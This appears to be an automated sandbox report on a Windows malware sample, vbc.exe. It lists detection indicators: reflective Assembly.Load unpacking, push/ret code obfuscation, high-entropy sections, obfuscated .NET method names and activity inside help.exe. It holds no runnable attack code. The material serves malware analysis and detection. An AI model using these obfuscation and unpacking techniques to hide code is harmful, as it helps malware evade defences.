Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6612:120:WilError_01
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\vbc.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: vbc.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: vbc.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wntdll.pdbUGP source: vbc.exe, 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: vbc.exe
Source: Binary string: help.pdbGCTL source: vbc.exe, 00000008.00000002.344023750.000000000139A000.00000004.00000020.sdmp
Source: Binary string: help.pdb source: vbc.exe, 00000008.00000002.344023750.000000000139A000.00000004.00000020.sdmp

Data Obfuscation:

.NET source code contains potential unpacker
Source: vbc.exe, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs .Net Code: MjkfkeWbw19SlgRDaUO System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: uZlkYhlkeLeaKC.exe.0.dr, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs .Net Code: MjkfkeWbw19SlgRDaUO System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.vbc.exe.6f0000.0.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs .Net Code: MjkfkeWbw19SlgRDaUO System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.vbc.exe.6f0000.0.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs .Net Code: MjkfkeWbw19SlgRDaUO System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.0.vbc.exe.d10000.5.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs .Net Code: MjkfkeWbw19SlgRDaUO System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.0.vbc.exe.d10000.2.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs .Net Code: MjkfkeWbw19SlgRDaUO System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.0.vbc.exe.d10000.7.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs .Net Code: MjkfkeWbw19SlgRDaUO System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.0.vbc.exe.d10000.0.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs .Net Code: MjkfkeWbw19SlgRDaUO System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.0.vbc.exe.d10000.9.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs .Net Code: MjkfkeWbw19SlgRDaUO System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.0.vbc.exe.d10000.3.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs .Net Code: MjkfkeWbw19SlgRDaUO System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.2.vbc.exe.d10000.1.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs .Net Code: MjkfkeWbw19SlgRDaUO System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.0.vbc.exe.d10000.1.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs .Net Code: MjkfkeWbw19SlgRDaUO System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\vbc.exe Code function: 0_2_006F7A49 push es; ret 0_2_006F7A74
Source: C:\Users\user\Desktop\vbc.exe Code function: 0_2_006F72F5 push cs; retf 0_2_006F7302
Source: C:\Users\user\Desktop\vbc.exe Code function: 0_2_006F8699 push es; ret 0_2_006F879A
Source: C:\Users\user\Desktop\vbc.exe Code function: 0_2_006F7151 push cs; retf 0_2_006F72F4
Source: C:\Users\user\Desktop\vbc.exe Code function: 0_2_006F87AD push es; ret 0_2_006F87B8
Source: C:\Users\user\Desktop\vbc.exe Code function: 0_2_006F879B push es; ret 0_2_006F87AC
Source: C:\Users\user\Desktop\vbc.exe Code function: 0_2_04FC95E5 push eax; retf 0_2_04FC95E6
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0041B832 push eax; ret 8_2_0041B838
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0041B83B push eax; ret 8_2_0041B8A2
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0041B89C push eax; ret 8_2_0041B8A2
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_00406907 push 00000060h; retf 8_2_0040691C
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0041A11B push ecx; ret 8_2_0041A11C
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0041A3BA pushfd ; ret 8_2_0041A3BB
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_004154EE pushad ; retf 8_2_004154F0
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_00419E43 push 0000007Eh; iretd 8_2_00419E45
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0040EFC6 push cs; ret 8_2_0040EFCC
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0041B7E5 push eax; ret 8_2_0041B838
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_00D17151 push cs; retf 8_2_00D172F4
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_00D172F5 push cs; retf 8_2_00D17302
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_00D17A49 push es; ret 8_2_00D17A74
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_00D18699 push es; ret 8_2_00D1879A
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_00D1879B push es; ret 8_2_00D187AC
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_00D187AD push es; ret 8_2_00D187B8
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0184D0D1 push ecx; ret 8_2_0184D0E4
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02B5A3BA pushfd ; ret 20_2_02B5A3BB
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02B5B89C push eax; ret 20_2_02B5B8A2
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02B5B832 push eax; ret 20_2_02B5B838
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02B5B83B push eax; ret 20_2_02B5B8A2
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02B5A11B push ecx; ret 20_2_02B5A11C
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02B46907 push 00000060h; retf 20_2_02B4691C
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02B59E43 push 0000007Eh; iretd 20_2_02B59E45
Source: initial sample Static PE information: section name: .text entropy: 7.9203967863
Source: vbc.exe, AgtYC0svqpyDJ8D48N/QD9BnHxR7XV0qd12wU.cs High entropy of concatenated method names: '.ctor', 'dsPTSCO1H', 'oWOSSrv9j', 'OfJB10hGMl', 'em1pANRQl', 'yqfAGlMVJ', 'yuA5vrsqr', 'RfwuSlvN8', 'moU97dL0i', 'qdJ6qO881'
Source: vbc.exe, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs High entropy of concatenated method names: '.ctor', 'XIBxdh8Ly9', 'DataRead', 'l37xZatdoJ', 'Dispose', 'proxqCZymk', 'yuVxVmWmTi', 'He3xbZMoHa', 'zIOxRLhoDl', 'rxcxeXmAaP'
Source: vbc.exe, OXBSoeGuXHDwBfdJeI/qdJqO8F81xeleYnv0b.cs High entropy of concatenated method names: '.ctor', 'bDqxIxJ4TM', 'DataRead', 'Dispose', 'PdgxvAiEfo', 'TDYvYixo7mKMhYVQuv', 'X0url2Onwcd52L7v7y', 'IrFSQu5xffnZPwWV1h', 'sEq7IjgES5aE4EbmeX', 'qEM3mgZLeVGT8tJfC8'
Source: vbc.exe, ARIcU5phZuuJGy8f4N/p3eXr0J4vbXIXcOyyG.cs High entropy of concatenated method names: 'QiwxzBO2nk', 'LD0sx7QshV', 'wUCssq3bga', 's3isYBTP5h', 'KqKsNi4Mns', 'bgcsmS6xax', 'yRRsOgfYNJ', '.ctor', 'sdLsHdMRFN', 'IS2s24dQar'
Source: vbc.exe, LEPY8IQG7o8c14QQID/sgNKEBNR5C8dvbjBk0.cs High entropy of concatenated method names: '.ctor', 'ehxHyj0Ex1', 'pklH5YCURa', 'DE6HftF8qk', 'kQeH9DJSPf', 'lEwHgo6H2W', 'RSiHltQY6q', 'h8fHDf67gk', 'XlWH7PHx4w', 'NZMHcQpXn1'
Source: vbc.exe, kCCmX5M5ywooU7dL0i/QCpuAvorsqrefwSlvN.cs High entropy of concatenated method names: 'uvf2wUDeWh', 'Kbm2rmq0u3', 'qjW2EGi83Q', 'uGU2zZYrcs', 'NXUxOKjOTP', 'hHCxHKlP66', 'rkSx2JhFE7', 'IYlxxdHdvs', 'SZXxsdRmD7', 'tCIxa2TWf4'
Source: vbc.exe, lN97os8sPSCO1HFWOS/lS6W61kAHRDpbNFrh3.cs High entropy of concatenated method names: '.ctor', 'oEd2tMVCl4', 'GMC2dxyS1M', 'nPQ2qUavKx', 'P5D2RhgIBH', 'ymJ2KxW5JL', 'B6J2VGuG5u', 'JHV2vmLZZD', 'n4n2WShPe4', 'GxJmBDUs4Gq0f9E626'
Source: vbc.exe, mIbtk3Ya1lo8WeoMB2/fOV2XXaiMao7N0Xw6p.cs High entropy of concatenated method names: '.ctor', 'r9MH3yu5ux', 'sK0HkP5CcO', 'iAQH1SWmNo', 'Xo2H4EKrct', 'KEbHMooGkJ', 'bhrHF66gwD', 'UevHnU902f', 'CHSHB4sRh8', 'vfJHUQVM7X'
Source: uZlkYhlkeLeaKC.exe.0.dr, AgtYC0svqpyDJ8D48N/QD9BnHxR7XV0qd12wU.cs High entropy of concatenated method names: '.ctor', 'dsPTSCO1H', 'oWOSSrv9j', 'OfJB10hGMl', 'em1pANRQl', 'yqfAGlMVJ', 'yuA5vrsqr', 'RfwuSlvN8', 'moU97dL0i', 'qdJ6qO881'
Source: uZlkYhlkeLeaKC.exe.0.dr, ARIcU5phZuuJGy8f4N/p3eXr0J4vbXIXcOyyG.cs High entropy of concatenated method names: 'QiwxzBO2nk', 'LD0sx7QshV', 'wUCssq3bga', 's3isYBTP5h', 'KqKsNi4Mns', 'bgcsmS6xax', 'yRRsOgfYNJ', '.ctor', 'sdLsHdMRFN', 'IS2s24dQar'
Source: uZlkYhlkeLeaKC.exe.0.dr, OXBSoeGuXHDwBfdJeI/qdJqO8F81xeleYnv0b.cs High entropy of concatenated method names: '.ctor', 'bDqxIxJ4TM', 'DataRead', 'Dispose', 'PdgxvAiEfo', 'TDYvYixo7mKMhYVQuv', 'X0url2Onwcd52L7v7y', 'IrFSQu5xffnZPwWV1h', 'sEq7IjgES5aE4EbmeX', 'qEM3mgZLeVGT8tJfC8'
Source: uZlkYhlkeLeaKC.exe.0.dr, lN97os8sPSCO1HFWOS/lS6W61kAHRDpbNFrh3.cs High entropy of concatenated method names: '.ctor', 'oEd2tMVCl4', 'GMC2dxyS1M', 'nPQ2qUavKx', 'P5D2RhgIBH', 'ymJ2KxW5JL', 'B6J2VGuG5u', 'JHV2vmLZZD', 'n4n2WShPe4', 'GxJmBDUs4Gq0f9E626'
Source: uZlkYhlkeLeaKC.exe.0.dr, mIbtk3Ya1lo8WeoMB2/fOV2XXaiMao7N0Xw6p.cs High entropy of concatenated method names: '.ctor', 'r9MH3yu5ux', 'sK0HkP5CcO', 'iAQH1SWmNo', 'Xo2H4EKrct', 'KEbHMooGkJ', 'bhrHF66gwD', 'UevHnU902f', 'CHSHB4sRh8', 'vfJHUQVM7X'
Source: uZlkYhlkeLeaKC.exe.0.dr, kCCmX5M5ywooU7dL0i/QCpuAvorsqrefwSlvN.cs High entropy of concatenated method names: 'uvf2wUDeWh', 'Kbm2rmq0u3', 'qjW2EGi83Q', 'uGU2zZYrcs', 'NXUxOKjOTP', 'hHCxHKlP66', 'rkSx2JhFE7', 'IYlxxdHdvs', 'SZXxsdRmD7', 'tCIxa2TWf4'
Source: uZlkYhlkeLeaKC.exe.0.dr, LEPY8IQG7o8c14QQID/sgNKEBNR5C8dvbjBk0.cs High entropy of concatenated method names: '.ctor', 'ehxHyj0Ex1', 'pklH5YCURa', 'DE6HftF8qk', 'kQeH9DJSPf', 'lEwHgo6H2W', 'RSiHltQY6q', 'h8fHDf67gk', 'XlWH7PHx4w', 'NZMHcQpXn1'
Source: uZlkYhlkeLeaKC.exe.0.dr, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs High entropy of concatenated method names: '.ctor', 'XIBxdh8Ly9', 'DataRead', 'l37xZatdoJ', 'Dispose', 'proxqCZymk', 'yuVxVmWmTi', 'He3xbZMoHa', 'zIOxRLhoDl', 'rxcxeXmAaP'
Source: 0.2.vbc.exe.6f0000.0.unpack, AgtYC0svqpyDJ8D48N/QD9BnHxR7XV0qd12wU.cs High entropy of concatenated method names: '.ctor', 'dsPTSCO1H', 'oWOSSrv9j', 'OfJB10hGMl', 'em1pANRQl', 'yqfAGlMVJ', 'yuA5vrsqr', 'RfwuSlvN8', 'moU97dL0i', 'qdJ6qO881'
Source: 0.2.vbc.exe.6f0000.0.unpack, OXBSoeGuXHDwBfdJeI/qdJqO8F81xeleYnv0b.cs High entropy of concatenated method names: '.ctor', 'bDqxIxJ4TM', 'DataRead', 'Dispose', 'PdgxvAiEfo', 'TDYvYixo7mKMhYVQuv', 'X0url2Onwcd52L7v7y', 'IrFSQu5xffnZPwWV1h', 'sEq7IjgES5aE4EbmeX', 'qEM3mgZLeVGT8tJfC8'
Source: 0.2.vbc.exe.6f0000.0.unpack, lN97os8sPSCO1HFWOS/lS6W61kAHRDpbNFrh3.cs High entropy of concatenated method names: '.ctor', 'oEd2tMVCl4', 'GMC2dxyS1M', 'nPQ2qUavKx', 'P5D2RhgIBH', 'ymJ2KxW5JL', 'B6J2VGuG5u', 'JHV2vmLZZD', 'n4n2WShPe4', 'GxJmBDUs4Gq0f9E626'
Source: 0.2.vbc.exe.6f0000.0.unpack, LEPY8IQG7o8c14QQID/sgNKEBNR5C8dvbjBk0.cs High entropy of concatenated method names: '.ctor', 'ehxHyj0Ex1', 'pklH5YCURa', 'DE6HftF8qk', 'kQeH9DJSPf', 'lEwHgo6H2W', 'RSiHltQY6q', 'h8fHDf67gk', 'XlWH7PHx4w', 'NZMHcQpXn1'
Source: 0.2.vbc.exe.6f0000.0.unpack, mIbtk3Ya1lo8WeoMB2/fOV2XXaiMao7N0Xw6p.cs High entropy of concatenated method names: '.ctor', 'r9MH3yu5ux', 'sK0HkP5CcO', 'iAQH1SWmNo', 'Xo2H4EKrct', 'KEbHMooGkJ', 'bhrHF66gwD', 'UevHnU902f', 'CHSHB4sRh8', 'vfJHUQVM7X'
Source: 0.2.vbc.exe.6f0000.0.unpack, kCCmX5M5ywooU7dL0i/QCpuAvorsqrefwSlvN.cs High entropy of concatenated method names: 'uvf2wUDeWh', 'Kbm2rmq0u3', 'qjW2EGi83Q', 'uGU2zZYrcs', 'NXUxOKjOTP', 'hHCxHKlP66', 'rkSx2JhFE7', 'IYlxxdHdvs', 'SZXxsdRmD7', 'tCIxa2TWf4'
Source: 0.2.vbc.exe.6f0000.0.unpack, ARIcU5phZuuJGy8f4N/p3eXr0J4vbXIXcOyyG.cs High entropy of concatenated method names: 'QiwxzBO2nk', 'LD0sx7QshV', 'wUCssq3bga', 's3isYBTP5h', 'KqKsNi4Mns', 'bgcsmS6xax', 'yRRsOgfYNJ', '.ctor', 'sdLsHdMRFN', 'IS2s24dQar'
Source: 0.2.vbc.exe.6f0000.0.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs High entropy of concatenated method names: '.ctor', 'XIBxdh8Ly9', 'DataRead', 'l37xZatdoJ', 'Dispose', 'proxqCZymk', 'yuVxVmWmTi', 'He3xbZMoHa', 'zIOxRLhoDl', 'rxcxeXmAaP'
Source: 0.0.vbc.exe.6f0000.0.unpack, AgtYC0svqpyDJ8D48N/QD9BnHxR7XV0qd12wU.cs High entropy of concatenated method names: '.ctor', 'dsPTSCO1H', 'oWOSSrv9j', 'OfJB10hGMl', 'em1pANRQl', 'yqfAGlMVJ', 'yuA5vrsqr', 'RfwuSlvN8', 'moU97dL0i', 'qdJ6qO881'
Source: 0.0.vbc.exe.6f0000.0.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs High entropy of concatenated method names: '.ctor', 'XIBxdh8Ly9', 'DataRead', 'l37xZatdoJ', 'Dispose', 'proxqCZymk', 'yuVxVmWmTi', 'He3xbZMoHa', 'zIOxRLhoDl', 'rxcxeXmAaP'
Source: 0.0.vbc.exe.6f0000.0.unpack, OXBSoeGuXHDwBfdJeI/qdJqO8F81xeleYnv0b.cs High entropy of concatenated method names: '.ctor', 'bDqxIxJ4TM', 'DataRead', 'Dispose', 'PdgxvAiEfo', 'TDYvYixo7mKMhYVQuv', 'X0url2Onwcd52L7v7y', 'IrFSQu5xffnZPwWV1h', 'sEq7IjgES5aE4EbmeX', 'qEM3mgZLeVGT8tJfC8'
Source: 0.0.vbc.exe.6f0000.0.unpack, ARIcU5phZuuJGy8f4N/p3eXr0J4vbXIXcOyyG.cs High entropy of concatenated method names: 'QiwxzBO2nk', 'LD0sx7QshV', 'wUCssq3bga', 's3isYBTP5h', 'KqKsNi4Mns', 'bgcsmS6xax', 'yRRsOgfYNJ', '.ctor', 'sdLsHdMRFN', 'IS2s24dQar'
Source: 0.0.vbc.exe.6f0000.0.unpack, kCCmX5M5ywooU7dL0i/QCpuAvorsqrefwSlvN.cs High entropy of concatenated method names: 'uvf2wUDeWh', 'Kbm2rmq0u3', 'qjW2EGi83Q', 'uGU2zZYrcs', 'NXUxOKjOTP', 'hHCxHKlP66', 'rkSx2JhFE7', 'IYlxxdHdvs', 'SZXxsdRmD7', 'tCIxa2TWf4'
Source: 0.0.vbc.exe.6f0000.0.unpack, lN97os8sPSCO1HFWOS/lS6W61kAHRDpbNFrh3.cs High entropy of concatenated method names: '.ctor', 'oEd2tMVCl4', 'GMC2dxyS1M', 'nPQ2qUavKx', 'P5D2RhgIBH', 'ymJ2KxW5JL', 'B6J2VGuG5u', 'JHV2vmLZZD', 'n4n2WShPe4', 'GxJmBDUs4Gq0f9E626'
Source: 0.0.vbc.exe.6f0000.0.unpack, mIbtk3Ya1lo8WeoMB2/fOV2XXaiMao7N0Xw6p.cs High entropy of concatenated method names: '.ctor', 'r9MH3yu5ux', 'sK0HkP5CcO', 'iAQH1SWmNo', 'Xo2H4EKrct', 'KEbHMooGkJ', 'bhrHF66gwD', 'UevHnU902f', 'CHSHB4sRh8', 'vfJHUQVM7X'
Source: 0.0.vbc.exe.6f0000.0.unpack, LEPY8IQG7o8c14QQID/sgNKEBNR5C8dvbjBk0.cs High entropy of concatenated method names: '.ctor', 'ehxHyj0Ex1', 'pklH5YCURa', 'DE6HftF8qk', 'kQeH9DJSPf', 'lEwHgo6H2W', 'RSiHltQY6q', 'h8fHDf67gk', 'XlWH7PHx4w', 'NZMHcQpXn1'
Source: 8.0.vbc.exe.d10000.5.unpack, AgtYC0svqpyDJ8D48N/QD9BnHxR7XV0qd12wU.cs High entropy of concatenated method names: '.ctor', 'dsPTSCO1H', 'oWOSSrv9j', 'OfJB10hGMl', 'em1pANRQl', 'yqfAGlMVJ', 'yuA5vrsqr', 'RfwuSlvN8', 'moU97dL0i', 'qdJ6qO881'
Source: 8.0.vbc.exe.d10000.5.unpack, OXBSoeGuXHDwBfdJeI/qdJqO8F81xeleYnv0b.cs High entropy of concatenated method names: '.ctor', 'bDqxIxJ4TM', 'DataRead', 'Dispose', 'PdgxvAiEfo', 'TDYvYixo7mKMhYVQuv', 'X0url2Onwcd52L7v7y', 'IrFSQu5xffnZPwWV1h', 'sEq7IjgES5aE4EbmeX', 'qEM3mgZLeVGT8tJfC8'
Source: 8.0.vbc.exe.d10000.5.unpack, lN97os8sPSCO1HFWOS/lS6W61kAHRDpbNFrh3.cs High entropy of concatenated method names: '.ctor', 'oEd2tMVCl4', 'GMC2dxyS1M', 'nPQ2qUavKx', 'P5D2RhgIBH', 'ymJ2KxW5JL', 'B6J2VGuG5u', 'JHV2vmLZZD', 'n4n2WShPe4', 'GxJmBDUs4Gq0f9E626'
Source: 8.0.vbc.exe.d10000.5.unpack, kCCmX5M5ywooU7dL0i/QCpuAvorsqrefwSlvN.cs High entropy of concatenated method names: 'uvf2wUDeWh', 'Kbm2rmq0u3', 'qjW2EGi83Q', 'uGU2zZYrcs', 'NXUxOKjOTP', 'hHCxHKlP66', 'rkSx2JhFE7', 'IYlxxdHdvs', 'SZXxsdRmD7', 'tCIxa2TWf4'
Source: 8.0.vbc.exe.d10000.5.unpack, mIbtk3Ya1lo8WeoMB2/fOV2XXaiMao7N0Xw6p.cs High entropy of concatenated method names: '.ctor', 'r9MH3yu5ux', 'sK0HkP5CcO', 'iAQH1SWmNo', 'Xo2H4EKrct', 'KEbHMooGkJ', 'bhrHF66gwD', 'UevHnU902f', 'CHSHB4sRh8', 'vfJHUQVM7X'
Source: 8.0.vbc.exe.d10000.5.unpack, LEPY8IQG7o8c14QQID/sgNKEBNR5C8dvbjBk0.cs High entropy of concatenated method names: '.ctor', 'ehxHyj0Ex1', 'pklH5YCURa', 'DE6HftF8qk', 'kQeH9DJSPf', 'lEwHgo6H2W', 'RSiHltQY6q', 'h8fHDf67gk', 'XlWH7PHx4w', 'NZMHcQpXn1'
Source: 8.0.vbc.exe.d10000.5.unpack, ARIcU5phZuuJGy8f4N/p3eXr0J4vbXIXcOyyG.cs High entropy of concatenated method names: 'QiwxzBO2nk', 'LD0sx7QshV', 'wUCssq3bga', 's3isYBTP5h', 'KqKsNi4Mns', 'bgcsmS6xax', 'yRRsOgfYNJ', '.ctor', 'sdLsHdMRFN', 'IS2s24dQar'
Source: 8.0.vbc.exe.d10000.5.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs High entropy of concatenated method names: '.ctor', 'XIBxdh8Ly9', 'DataRead', 'l37xZatdoJ', 'Dispose', 'proxqCZymk', 'yuVxVmWmTi', 'He3xbZMoHa', 'zIOxRLhoDl', 'rxcxeXmAaP'
Source: 8.0.vbc.exe.d10000.2.unpack, AgtYC0svqpyDJ8D48N/QD9BnHxR7XV0qd12wU.cs High entropy of concatenated method names: '.ctor', 'dsPTSCO1H', 'oWOSSrv9j', 'OfJB10hGMl', 'em1pANRQl', 'yqfAGlMVJ', 'yuA5vrsqr', 'RfwuSlvN8', 'moU97dL0i', 'qdJ6qO881'
Source: 8.0.vbc.exe.d10000.2.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs High entropy of concatenated method names: '.ctor', 'XIBxdh8Ly9', 'DataRead', 'l37xZatdoJ', 'Dispose', 'proxqCZymk', 'yuVxVmWmTi', 'He3xbZMoHa', 'zIOxRLhoDl', 'rxcxeXmAaP'
Source: 8.0.vbc.exe.d10000.2.unpack, ARIcU5phZuuJGy8f4N/p3eXr0J4vbXIXcOyyG.cs High entropy of concatenated method names: 'QiwxzBO2nk', 'LD0sx7QshV', 'wUCssq3bga', 's3isYBTP5h', 'KqKsNi4Mns', 'bgcsmS6xax', 'yRRsOgfYNJ', '.ctor', 'sdLsHdMRFN', 'IS2s24dQar'
Source: 8.0.vbc.exe.d10000.2.unpack, OXBSoeGuXHDwBfdJeI/qdJqO8F81xeleYnv0b.cs High entropy of concatenated method names: '.ctor', 'bDqxIxJ4TM', 'DataRead', 'Dispose', 'PdgxvAiEfo', 'TDYvYixo7mKMhYVQuv', 'X0url2Onwcd52L7v7y', 'IrFSQu5xffnZPwWV1h', 'sEq7IjgES5aE4EbmeX', 'qEM3mgZLeVGT8tJfC8'
Source: 8.0.vbc.exe.d10000.2.unpack, kCCmX5M5ywooU7dL0i/QCpuAvorsqrefwSlvN.cs High entropy of concatenated method names: 'uvf2wUDeWh', 'Kbm2rmq0u3', 'qjW2EGi83Q', 'uGU2zZYrcs', 'NXUxOKjOTP', 'hHCxHKlP66', 'rkSx2JhFE7', 'IYlxxdHdvs', 'SZXxsdRmD7', 'tCIxa2TWf4'
Source: 8.0.vbc.exe.d10000.2.unpack, lN97os8sPSCO1HFWOS/lS6W61kAHRDpbNFrh3.cs High entropy of concatenated method names: '.ctor', 'oEd2tMVCl4', 'GMC2dxyS1M', 'nPQ2qUavKx', 'P5D2RhgIBH', 'ymJ2KxW5JL', 'B6J2VGuG5u', 'JHV2vmLZZD', 'n4n2WShPe4', 'GxJmBDUs4Gq0f9E626'
Source: 8.0.vbc.exe.d10000.2.unpack, LEPY8IQG7o8c14QQID/sgNKEBNR5C8dvbjBk0.cs High entropy of concatenated method names: '.ctor', 'ehxHyj0Ex1', 'pklH5YCURa', 'DE6HftF8qk', 'kQeH9DJSPf', 'lEwHgo6H2W', 'RSiHltQY6q', 'h8fHDf67gk', 'XlWH7PHx4w', 'NZMHcQpXn1'
Source: 8.0.vbc.exe.d10000.2.unpack, mIbtk3Ya1lo8WeoMB2/fOV2XXaiMao7N0Xw6p.cs High entropy of concatenated method names: '.ctor', 'r9MH3yu5ux', 'sK0HkP5CcO', 'iAQH1SWmNo', 'Xo2H4EKrct', 'KEbHMooGkJ', 'bhrHF66gwD', 'UevHnU902f', 'CHSHB4sRh8', 'vfJHUQVM7X'
Source: 8.0.vbc.exe.d10000.7.unpack, AgtYC0svqpyDJ8D48N/QD9BnHxR7XV0qd12wU.cs High entropy of concatenated method names: '.ctor', 'dsPTSCO1H', 'oWOSSrv9j', 'OfJB10hGMl', 'em1pANRQl', 'yqfAGlMVJ', 'yuA5vrsqr', 'RfwuSlvN8', 'moU97dL0i', 'qdJ6qO881'
Source: 8.0.vbc.exe.d10000.7.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs High entropy of concatenated method names: '.ctor', 'XIBxdh8Ly9', 'DataRead', 'l37xZatdoJ', 'Dispose', 'proxqCZymk', 'yuVxVmWmTi', 'He3xbZMoHa', 'zIOxRLhoDl', 'rxcxeXmAaP'
Source: 8.0.vbc.exe.d10000.7.unpack, OXBSoeGuXHDwBfdJeI/qdJqO8F81xeleYnv0b.cs High entropy of concatenated method names: '.ctor', 'bDqxIxJ4TM', 'DataRead', 'Dispose', 'PdgxvAiEfo', 'TDYvYixo7mKMhYVQuv', 'X0url2Onwcd52L7v7y', 'IrFSQu5xffnZPwWV1h', 'sEq7IjgES5aE4EbmeX', 'qEM3mgZLeVGT8tJfC8'
Source: 8.0.vbc.exe.d10000.7.unpack, ARIcU5phZuuJGy8f4N/p3eXr0J4vbXIXcOyyG.cs High entropy of concatenated method names: 'QiwxzBO2nk', 'LD0sx7QshV', 'wUCssq3bga', 's3isYBTP5h', 'KqKsNi4Mns', 'bgcsmS6xax', 'yRRsOgfYNJ', '.ctor', 'sdLsHdMRFN', 'IS2s24dQar'
Source: 8.0.vbc.exe.d10000.7.unpack, lN97os8sPSCO1HFWOS/lS6W61kAHRDpbNFrh3.cs High entropy of concatenated method names: '.ctor', 'oEd2tMVCl4', 'GMC2dxyS1M', 'nPQ2qUavKx', 'P5D2RhgIBH', 'ymJ2KxW5JL', 'B6J2VGuG5u', 'JHV2vmLZZD', 'n4n2WShPe4', 'GxJmBDUs4Gq0f9E626'
Source: 8.0.vbc.exe.d10000.7.unpack, kCCmX5M5ywooU7dL0i/QCpuAvorsqrefwSlvN.cs High entropy of concatenated method names: 'uvf2wUDeWh', 'Kbm2rmq0u3', 'qjW2EGi83Q', 'uGU2zZYrcs', 'NXUxOKjOTP', 'hHCxHKlP66', 'rkSx2JhFE7', 'IYlxxdHdvs', 'SZXxsdRmD7', 'tCIxa2TWf4'
Source: 8.0.vbc.exe.d10000.7.unpack, LEPY8IQG7o8c14QQID/sgNKEBNR5C8dvbjBk0.cs High entropy of concatenated method names: '.ctor', 'ehxHyj0Ex1', 'pklH5YCURa', 'DE6HftF8qk', 'kQeH9DJSPf', 'lEwHgo6H2W', 'RSiHltQY6q', 'h8fHDf67gk', 'XlWH7PHx4w', 'NZMHcQpXn1'
Source: 8.0.vbc.exe.d10000.7.unpack, mIbtk3Ya1lo8WeoMB2/fOV2XXaiMao7N0Xw6p.cs High entropy of concatenated method names: '.ctor', 'r9MH3yu5ux', 'sK0HkP5CcO', 'iAQH1SWmNo', 'Xo2H4EKrct', 'KEbHMooGkJ', 'bhrHF66gwD', 'UevHnU902f', 'CHSHB4sRh8', 'vfJHUQVM7X'
Source: 8.0.vbc.exe.d10000.0.unpack, AgtYC0svqpyDJ8D48N/QD9BnHxR7XV0qd12wU.cs High entropy of concatenated method names: '.ctor', 'dsPTSCO1H', 'oWOSSrv9j', 'OfJB10hGMl', 'em1pANRQl', 'yqfAGlMVJ', 'yuA5vrsqr', 'RfwuSlvN8', 'moU97dL0i', 'qdJ6qO881'
